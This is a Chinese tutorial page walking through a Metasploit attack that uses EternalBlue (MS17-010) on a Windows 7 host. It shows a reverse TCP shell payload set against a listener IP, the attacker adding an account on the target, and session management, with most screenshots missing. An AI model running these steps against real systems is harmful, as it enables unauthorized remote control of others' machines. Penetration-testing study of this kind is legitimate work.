实战-使用msf渗透攻击win7主机并远程执行命令

简介: 实战-使用msf渗透攻击win7主机并远程执行命令

 1.什么是永恒之蓝?

 

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.通过msf模块获取win7主机远程shell

模块的整体使用流程如下

image.gif编辑

1.我们先扫描目标是否存在ms17-010漏洞

image.gif编辑

2.加载对应的模块

image.gif编辑

3.查看需要设置的参数

show options

image.gif编辑

4.设置目标主机

image.gif编辑

5.开始扫描,run运行

如图,我们可以确定目标是脆弱的,系统里有ms17-010漏洞。image.gif编辑

6.查找攻击模块

image.gif编辑

7.加载攻击模块

image.gif编辑

8.查看需要设置的参数

image.gif编辑

9.设置目标主机

image.gif编辑

10.查看该攻击载荷使用的系统类型show targets

如图,可以看出永恒之蓝可以针对win7和server 2008操作系统。

image.gif编辑

11.查看该模块可以使用的攻击载荷 show payloads

image.gif编辑

12.选择攻击模块 show windows/x64/shellimage.gif编辑

13.设置攻击载荷 set payload windows/x64/shell/reverse_tcp

image.gif编辑

14.设置本地主机 set LHOST 192.168.0.109

15.查看设置参数

image.gif编辑

16.run运行

如图,渗透成功。

image.gif编辑

17.执行一些命令去测试一下

添加一个账号

image.gif编辑

在win7系统里查看用户。如图,添加成功。

image.gif编辑

但是,我们在终端模拟器里看到一些乱码。

image.gif编辑

原因是:一个是linux系统,一个是windows系统,编码方式不一样。

解决办法:chcp 65001

image.gif编辑

image.gif编辑

查看我们的权限。

如图,可以看到我们是系统最高权限及root权限。

image.gif编辑

终端会话:ctrl+c

image.gif编辑

 拿到会话后,我们将其保存到后台 exploit -j

image.gif编辑

此时,会话保存到后台了。我们输入sessions,进行查看。

image.gif编辑

记录会话 sessions -i 4

image.gif编辑

退出但不断开这个链接 background

image.gif编辑

删除会话 sessions -k 4

image.gif编辑

3.总结使用metasploit攻击的步骤

1.查找CVE公布的漏洞

2.查找对应的exploit模块

3.配置模块参数

4.添加payload后门

5.执行exploit开始攻击


相关文章
|
2月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
66 3
|
安全 Linux 网络安全
使用D盾扫描Linux主机Webshell
使用D盾扫描Linux主机Webshell
481 0
使用D盾扫描Linux主机Webshell
|
网络协议
Metasploit -- 指定端口扫描主机
Metasploit -- 指定端口扫描主机
113 0
Metasploit -- 指定端口扫描主机
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
562 0
Metasploit -- 攻击Metasploitable2靶机
|
安全 网络协议 网络安全
【工具】nmap的详细利用-主机发现-端口扫描-系统服务识别扫描-脚本利用
本文适合初学者以及想要进阶的小伙伴们,我们将从最简单的出发,一步步实现工具的精通,此外本文配有视频讲解,让您的理解更近一步。
498 0
|
安全 网络协议 Linux
Linux—nmap、nc命令 –网络探测工具和安全和端口扫描器
nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,当然用它扫描单个 主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息), 它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap通常用于安全审核, 许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息,管理服务升级计划,以及监视主机和服务的运行。
464 0
|
安全 Shell 数据安全/隐私保护
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。
458 0
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
|
监控 安全 Linux